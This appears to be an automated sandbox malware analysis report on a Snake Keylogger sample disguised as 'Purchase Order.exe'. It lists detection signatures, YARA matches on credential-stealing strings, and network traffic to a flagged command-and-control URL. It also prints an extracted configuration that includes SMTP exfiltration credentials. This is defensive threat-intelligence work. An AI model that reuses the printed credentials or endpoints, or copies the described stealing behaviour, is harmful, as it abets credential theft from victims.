Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name:	Purchase Order.exe
Analysis ID:	1420020
MD5:	654c1586b15a278983493f57f72cacb7
SHA1:	5b6df8769764505ffdb7691ac2150d4327eb8104
SHA256:	191239a61c70ba900694d294a164f4a162b84d11672871fbb5389967bbf52c7e
Tags:	exeSnakeKeylogger
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Purchase Order.exe (PID: 5304 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 654C1586B15A278983493F57F72CACB7)

Purchase Order.exe (PID: 2412 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 654C1586B15A278983493F57F72CACB7)

Purchase Order.exe (PID: 3304 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 654C1586B15A278983493F57F72CACB7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14782:$a1: get_encryptedPassword 0x14a78:$a2: get_encryptedUsername 0x1458e:$a3: get_timePasswordChanged 0x14689:$a4: get_passwordField 0x14798:$a5: set_encryptedPassword 0x15d9b:$a7: get_logins 0x15cfe:$a10: KeyLoggerEventArgs 0x15997:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x180c0:$x1: $%SMTPDV$ 0x18124:$x2: $#TheHashHere%& 0x1975f:$x3: %FTPDV$ 0x19853:$x4: $%TelegramDv$ 0x15997:$x5: KeyLoggerEventArgs 0x15cfe:$x5: KeyLoggerEventArgs 0x19783:$m2: Clipboard Logs ID 0x1994f:$m2: Screenshot Logs ID 0x19a1b:$m2: keystroke Logs ID 0x19927:$m4: \SnakeKeylogger\
00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe18fa:$a1: get_encryptedPassword 0x10211a:$a1: get_encryptedPassword 0x12273a:$a1: get_encryptedPassword 0xe1bf0:$a2: get_encryptedUsername 0x102410:$a2: get_encryptedUsername 0x122a30:$a2: get_encryptedUsername 0xe1706:$a3: get_timePasswordChanged 0x101f26:$a3: get_timePasswordChanged 0x122546:$a3: get_timePasswordChanged 0xe1801:$a4: get_passwordField 0x102021:$a4: get_passwordField 0x122641:$a4: get_passwordField 0xe1910:$a5: set_encryptedPassword 0x102130:$a5: set_encryptedPassword 0x122750:$a5: set_encryptedPassword 0xe2f13:$a7: get_logins 0x103733:$a7: get_logins 0x123d53:$a7: get_logins 0xe2e76:$a10: KeyLoggerEventArgs 0x103696:$a10: KeyLoggerEventArgs 0x123cb6:$a10: KeyLoggerEventArgs
00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xe5238:$x1: $%SMTPDV$ 0x105a58:$x1: $%SMTPDV$ 0x126078:$x1: $%SMTPDV$ 0xe529c:$x2: $#TheHashHere%& 0x105abc:$x2: $#TheHashHere%& 0x1260dc:$x2: $#TheHashHere%& 0xe68d7:$x3: %FTPDV$ 0x1070f7:$x3: %FTPDV$ 0x127717:$x3: %FTPDV$ 0xe69cb:$x4: $%TelegramDv$ 0x1071eb:$x4: $%TelegramDv$ 0x12780b:$x4: $%TelegramDv$ 0xe2b0f:$x5: KeyLoggerEventArgs 0xe2e76:$x5: KeyLoggerEventArgs 0x10332f:$x5: KeyLoggerEventArgs 0x103696:$x5: KeyLoggerEventArgs 0x12394f:$x5: KeyLoggerEventArgs 0x123cb6:$x5: KeyLoggerEventArgs 0xe68fb:$m2: Clipboard Logs ID 0xe6ac7:$m2: Screenshot Logs ID 0xe6b93:$m2: keystroke Logs ID
00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 5304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Purchase Order.exe PID: 5304	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Purchase Order.exe PID: 5304	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 5304	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe179:$a1: get_encryptedPassword 0xe465:$a2: get_encryptedUsername 0xdf8f:$a3: get_timePasswordChanged 0xe08a:$a4: get_passwordField 0xe18f:$a5: set_encryptedPassword 0x106d7:$a7: get_logins 0x1063a:$a10: KeyLoggerEventArgs 0x102d3:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Purchase Order.exe PID: 5304	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x102d3:$x5: KeyLoggerEventArgs 0x1063a:$x5: KeyLoggerEventArgs 0x10f28:$x5: KeyLoggerEventArgs 0x1125c:$x5: KeyLoggerEventArgs 0x1285c:$m2: Clipboard Logs ID 0x1293c:$m2: Screenshot Logs ID 0x12970:$m2: keystroke Logs ID 0x12928:$m4: \SnakeKeylogger\
Process Memory Space: Purchase Order.exe PID: 3304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Purchase Order.exe PID: 3304	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Purchase Order.exe PID: 3304	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2865c:$a1: get_encryptedPassword 0x28948:$a2: get_encryptedUsername 0x28472:$a3: get_timePasswordChanged 0x2856d:$a4: get_passwordField 0x28672:$a5: set_encryptedPassword 0x2abba:$a7: get_logins 0x2ab1d:$a10: KeyLoggerEventArgs 0x2a7b6:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Purchase Order.exe PID: 3304	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2a7b6:$x5: KeyLoggerEventArgs 0x2ab1d:$x5: KeyLoggerEventArgs 0x2b40b:$x5: KeyLoggerEventArgs 0x2b73f:$x5: KeyLoggerEventArgs 0x2cd3f:$m2: Clipboard Logs ID 0x2ce1f:$m2: Screenshot Logs ID 0x2ce53:$m2: keystroke Logs ID 0x2ce0b:$m4: \SnakeKeylogger\
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Purchase Order.exe.39cb798.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order.exe.39cb798.7.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Purchase Order.exe.39cb798.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b82:$a1: get_encryptedPassword 0x12e78:$a2: get_encryptedUsername 0x1298e:$a3: get_timePasswordChanged 0x12a89:$a4: get_passwordField 0x12b98:$a5: set_encryptedPassword 0x1419b:$a7: get_logins 0x140fe:$a10: KeyLoggerEventArgs 0x13d97:$a11: KeyLoggerEventArgsEventHandler
0.2.Purchase Order.exe.39cb798.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b00:$a4: \Orbitum\User Data\Default\Login Data 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
0.2.Purchase Order.exe.39cb798.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1372d:$s1: UnHook 0x13734:$s2: SetHook 0x1373c:$s3: CallNextHook 0x13749:$s4: _hook
0.2.Purchase Order.exe.39cb798.7.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164c0:$x1: $%SMTPDV$ 0x16524:$x2: $#TheHashHere%& 0x17b5f:$x3: %FTPDV$ 0x17c53:$x4: $%TelegramDv$ 0x13d97:$x5: KeyLoggerEventArgs 0x140fe:$x5: KeyLoggerEventArgs 0x17b83:$m2: Clipboard Logs ID 0x17d4f:$m2: Screenshot Logs ID 0x17e1b:$m2: keystroke Logs ID 0x17d27:$m4: \SnakeKeylogger\
0.2.Purchase Order.exe.39aaf78.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order.exe.39aaf78.9.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Purchase Order.exe.39aaf78.9.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b82:$a1: get_encryptedPassword 0x12e78:$a2: get_encryptedUsername 0x1298e:$a3: get_timePasswordChanged 0x12a89:$a4: get_passwordField 0x12b98:$a5: set_encryptedPassword 0x1419b:$a7: get_logins 0x140fe:$a10: KeyLoggerEventArgs 0x13d97:$a11: KeyLoggerEventArgsEventHandler
0.2.Purchase Order.exe.39aaf78.9.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b00:$a4: \Orbitum\User Data\Default\Login Data 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
0.2.Purchase Order.exe.39aaf78.9.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1372d:$s1: UnHook 0x13734:$s2: SetHook 0x1373c:$s3: CallNextHook 0x13749:$s4: _hook
0.2.Purchase Order.exe.39aaf78.9.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164c0:$x1: $%SMTPDV$ 0x16524:$x2: $#TheHashHere%& 0x17b5f:$x3: %FTPDV$ 0x17c53:$x4: $%TelegramDv$ 0x13d97:$x5: KeyLoggerEventArgs 0x140fe:$x5: KeyLoggerEventArgs 0x17b83:$m2: Clipboard Logs ID 0x17d4f:$m2: Screenshot Logs ID 0x17e1b:$m2: keystroke Logs ID 0x17d27:$m4: \SnakeKeylogger\
4.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.Purchase Order.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.Purchase Order.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler
4.2.Purchase Order.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c29b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b900:$a4: \Orbitum\User Data\Default\Login Data 0x1c93f:$a5: \Kometa\User Data\Default\Login Data
4.2.Purchase Order.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x15534:$s2: SetHook 0x1553c:$s3: CallNextHook 0x15549:$s4: _hook
4.2.Purchase Order.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\
0.2.Purchase Order.exe.39cb798.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order.exe.39cb798.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Purchase Order.exe.39cb798.7.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Purchase Order.exe.39cb798.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x34fa2:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x35298:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x34dae:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x34ea9:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x34fb8:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x365bb:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x3651e:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler 0x361b7:$a11: KeyLoggerEventArgsEventHandler
0.2.Purchase Order.exe.39cb798.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x35b4d:$s1: UnHook 0x15534:$s2: SetHook 0x35b54:$s2: SetHook 0x1553c:$s3: CallNextHook 0x35b5c:$s3: CallNextHook 0x15549:$s4: _hook 0x35b69:$s4: _hook
0.2.Purchase Order.exe.39cb798.7.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x388e0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x38944:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x39f7f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x3a073:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x361b7:$x5: KeyLoggerEventArgs 0x3651e:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x39fa3:$m2: Clipboard Logs ID 0x3a16f:$m2: Screenshot Logs ID 0x3a23b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\ 0x3a147:$m4: \SnakeKeylogger\
0.2.Purchase Order.exe.39aaf78.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order.exe.39aaf78.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Purchase Order.exe.39aaf78.9.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Purchase Order.exe.39aaf78.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x351a2:$a1: get_encryptedPassword 0x557c2:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x35498:$a2: get_encryptedUsername 0x55ab8:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x34fae:$a3: get_timePasswordChanged 0x555ce:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x350a9:$a4: get_passwordField 0x556c9:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x351b8:$a5: set_encryptedPassword 0x557d8:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x367bb:$a7: get_logins 0x56ddb:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x3671e:$a10: KeyLoggerEventArgs 0x56d3e:$a10: KeyLoggerEventArgs
0.2.Purchase Order.exe.39aaf78.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x35d4d:$s1: UnHook 0x5636d:$s1: UnHook 0x15534:$s2: SetHook 0x35d54:$s2: SetHook 0x56374:$s2: SetHook 0x1553c:$s3: CallNextHook 0x35d5c:$s3: CallNextHook 0x5637c:$s3: CallNextHook 0x15549:$s4: _hook 0x35d69:$s4: _hook 0x56389:$s4: _hook
0.2.Purchase Order.exe.39aaf78.9.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x38ae0:$x1: $%SMTPDV$ 0x59100:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x38b44:$x2: $#TheHashHere%& 0x59164:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x3a17f:$x3: %FTPDV$ 0x5a79f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x3a273:$x4: $%TelegramDv$ 0x5a893:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x363b7:$x5: KeyLoggerEventArgs 0x3671e:$x5: KeyLoggerEventArgs 0x569d7:$x5: KeyLoggerEventArgs 0x56d3e:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order.exe, Initiated: true, ProcessId: 3304, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: Purchase Order.exe	ReversingLabs: Detection: 21%
Source: Purchase Order.exe	Virustotal: Detection: 29%			Perma Link

Machine Learning detection for sample

Source: Purchase Order.exe

Joe Sandbox ML: detected

Source: Purchase Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49710 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.5:49724 version: TLS 1.2

Source: Purchase Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: EeBu.pdbSHA256 source: Purchase Order.exe
Source:	Binary string: EeBu.pdb source: Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 0152FCD1h	4_2_0152FA10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 0152EFDDh	4_2_0152EDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 0152F967h	4_2_0152EDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_0152E310
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC8945h	4_2_06CC8608
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC72FAh	4_2_06CC7050
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC6171h	4_2_06CC5EC8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC58C1h	4_2_06CC5618
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC6A21h	4_2_06CC6778
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC0741h	4_2_06CC0498
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC7751h	4_2_06CC74A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC0FF1h	4_2_06CC0D48
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC8001h	4_2_06CC7D58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC5D19h	4_2_06CC5A70
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC6E79h	4_2_06CC6BD0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_06CC33A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_06CC33B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC65C9h	4_2_06CC6320
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC0B99h	4_2_06CC08F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC02E9h	4_2_06CC0040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC5441h	4_2_06CC5198
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC8459h	4_2_06CC81B0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 4x nop then jmp 06CC7BA9h	4_2_06CC7900

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.5:49733 -> 208.91.198.143:587

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.91.198.143 208.91.198.143
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 172.67.169.18 172.67.169.18
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic

TCP traffic: 192.168.2.5:49733 -> 208.91.198.143:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
